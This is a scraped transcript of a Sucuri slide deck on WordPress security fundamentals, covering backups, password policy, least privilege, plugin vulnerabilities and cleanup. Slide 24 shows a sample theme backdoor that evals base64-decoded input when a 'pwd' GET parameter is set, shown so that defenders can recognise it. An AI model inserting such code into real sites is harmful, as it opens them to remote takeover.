Wordpress. Wordpress… Open Source – GNU General Public License Wordpress…
WordPress Security: Fundamentals for Professionals by Joseph ...
Transcript of WordPress Security: Fundamentals for Professionals by Joseph ...
![Page 1: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/1.jpg)
![Page 2: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/2.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
WEB DESIGN AND INFORMATION SECURITY
Committed to WordPress since 2008.
SUCURI – Researcher and Account Manager
Removing malware and protecting websites.
Personally cleaned over 5,000 websites
SUCURI.NET
Twitter: @JHerbrandson
ABOUT ME
![Page 3: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/3.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
SECURITY SCANNING & ANALYSIS
Checking the health over 3 Million websites every month through our free Sitecheck Scanner: http://sitecheck.sucuri.net
MALWARE CLEANUP
Cleaning and remediating 300 – 400 hacked or infected websites everyday.
ATTACK PROTECTION
Blocking over 33 million attacks and instances of malicious traffic every month
EDUCATION
Providing detailed and actionable security information through our blog at http://blog.sucuri.net
ABOUT SUCURI Over 45 Security Professionals Making a Safer Web
!
H
G
"
![Page 4: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/4.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
ATTACK TRAFFIC ORIGINS Map.Ipviking.com
![Page 5: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/5.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
A QUICK DEMO Attack in Progress:
https://www.youtube.com/watch?v=v4Xr3LrixVg&list=UUzkxqKA_bkNlj1-nX5f2LNA
![Page 6: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/6.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
Sooo… WHY? It’s Just Business…probably
- The Short Answer: Fame and Fortune
- $BILLION Spam – Generic Pharmaceuticals, Payday Loans, Gambling, Designed Brand Knock Offs
- Hacktivism – Politics and religion at the speed of download
- Immaturity – Kids being kids
![Page 7: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/7.jpg)
Start with the Basics
#
I
![Page 8: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/8.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
THE NEED FOR SECURITY THE STATE OF THE INTERNET
www.internetlivestats.com
![Page 9: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/9.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
Shared Hosting Dedicated Hosting
Managed Hosting
HOSTING OPTIONS Choose wisely
Done for you
All yours Cheap
![Page 10: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/10.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
MANAGED-HOSTING PROVIDERS WordPress Experts for Everyone!
![Page 11: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/11.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
SPEAKING OF ENVIRONMENT… Who is using the Public Wifi?
![Page 12: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/12.jpg)
No Easy Path
( II
![Page 13: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/13.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
WORD of WARNING No chance of 0% risk.
The next ‘0-Day’ attack is always around the corner…
![Page 14: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/14.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
SECURITY HEADLINES Proof: Seen the news lately?
![Page 15: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/15.jpg)
ALWAYS Backup
c III
![Page 16: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/16.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
Have a low profile, non-threatening site? You are still getting attention
BUT I’VE NEVER HAD A PROBLEM BEFORE…
s
![Page 17: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/17.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
HACKERS HARD AT WORK
PHARMACEUTICAL SPAM MAKES HACKERS TWO BILLION DOLLARS/YEAR
SOLUTION: OFFSITE BACKUPS
RESULT: CLEAN SITE IMMEDIATELY
FREE WEBSITE REBRAND
K
$
j
å
![Page 18: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/18.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
AUTOMATED BACKUPS Know you have a backup plan
ithemes.com/backupbuddy/
Vaultpress.com Sucuri.net Your hosting company
$
backup buddy vaultpress sucuri backups webhosting backups
![Page 19: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/19.jpg)
Take Password Policy Seriously
t IV
![Page 20: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/20.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
Password Last Year’s Rank
‘123456’ 2
‘password’ 1
‘12345678’ 3
‘qwerty’ 5
‘abc123’ 4
Top 5 passwords used in 2013 Seriously….
credit: SplashData.com
![Page 21: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/21.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
PASSWORD MANAGER Remembers your passwords so you don’t have to
lastpass.com agilebits.com keepass.info dashlane.com
lastpass 1password keypass dashlane
![Page 22: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/22.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
LEAST PRIVILEGE Does your user setup look like this?
Hosting/ control panel Administrator FTP/SFTP
root access Editor/
contributer
Actual Admin
1 !Potential Hackers
7 !
Friends
12 !
Writers 2 !
Seo Guys 4 !
Analysts
2 !
Editors
1 !
Random People
10 !
5 !Hackers
3 !Friends Again…
![Page 23: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/23.jpg)
Steal and Be Stolen From
w
V
![Page 24: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/24.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
This probably shouldn’t be in your theme:
if(isset($_GET['pwd'])) {
eval(base64_decode("CiRhdXRoX3Bhc3MgPSAiN2U5NBhY3RpdmF0ZXMsIGNoYW5nZWQgZWxlbWVudHMgaW4gdGhlIG9yaWdpbmFsIHBsdWdpbiwgZGVzaWduZWQgdG8gYmVoYXZlIGxpa2UgY2xlYW4gY29kZSwgc2lnbmFsIHRoZSBoYWNrZXIgdG8gbGV0IGl0IGtub3cgdGhhdCBpdOKAmXMgaW4uIEEgY2xlYW4gYmFjayBkb29yIGhhcyBiZWVuIG9wZW5lZCwgYW5kIHlvdXIgc2l0ZSBpcyBub3cgb24gYW4gYXV0b21hdGVkIGF0dGFjayBsaXN0LCBtZWFudCB0byBxdWlldGx5IGluZmVjdCBhbmQgcmVpbmZlY3QgeW91ciBzaXRlIGFnYWluIGFuZCBhZw==“)); }
NOT THE CODE YOU’RE LOOKING FOR… Assisting the enemy
!
![Page 26: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/26.jpg)
Have a System
K VI
![Page 27: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/27.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
A SYSTEM TO LIVE BY
1. Protect! – Your computer has a firewall, why doesn’t your website? 2. Detect! – The same goes for AntiVirus. 3. Respond! – Clean up the mess. You have a backup right?
Encompassing Actions: - Know the best practices - Mind your maintenance
![Page 29: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/29.jpg)
c Understand the Changing Landscape
VII
![Page 30: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/30.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
WORDPRESS CORE Strong and Secure
Dedicated Creators
Making WordPress Solid and Secure
Auto-Updates
Get important patches right away.
Support
Everything you need at WordPress.org
( j Ñ
![Page 31: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/31.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
WordPress Version Distribution 3.0 – 4.0 (wordpress.org/about/stats/)
![Page 32: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/32.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
3rd Party VULNERABILITIES Keep watch
Vulnerabilities disclosed at http://blog.sucuri.net
All-In-One SEO – 20 Million Downloads WPtouch – 6 Million Downloads MailPoet - 2.7 Million Downloads Custom Contact Forms – 640k Downloads Slider Revolution – Hundreds of Thousands (themeforest/codecanyon)
![Page 33: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/33.jpg)
Going further
Z X
Tips, Tools, and Services
![Page 34: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/34.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
Don’t be the mark! Understand the changes you are implementing
“AntiVirus” “Firewall”
WEBSITE ANTIVIRUS & FIREWALL Protection and Detection
WordFence Sucuri Website Antivirus
CloudFlare Sucuri Website Firewall
“Utilities” iThemes Security BruteProtect Sucuri Security Plugin
![Page 35: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/35.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
RESOURCES Because you don’t know what you don’t know
General WordPress Security: https://codex.wordpress.org/Hardening_WordPress https://blog.sucuri.net Hacking and General Security: http://www.securityfocus.com/ http://blogs.sophos.com/ Facebook Groups: WordPress Security Advanced WordPress
SubReddits: Reddit.com/r/Hacking Reddit.com/r/WordPress
![Page 36: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/36.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
EASY PATH TO CLEANUP
NEED: Releases of WordPress at: https://wordpress.org/download/release-archive/ Clean backup of active theme and required plugins New Passwords (WordPress, FTP, Hosting Control Panel, Everything Else)
Response
![Page 37: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/37.jpg)
joseph herbrandson | www.sucuri.net 1-888-873-0817| [email protected]
![Page 38: WordPress Security: Fundamentals for Professionals by Joseph ...](https://reader033.fdocuments.us/reader033/viewer/2022051715/5891bdd41a28ab93088beabf/html5/thumbnails/38.jpg)
YOU! THANK
%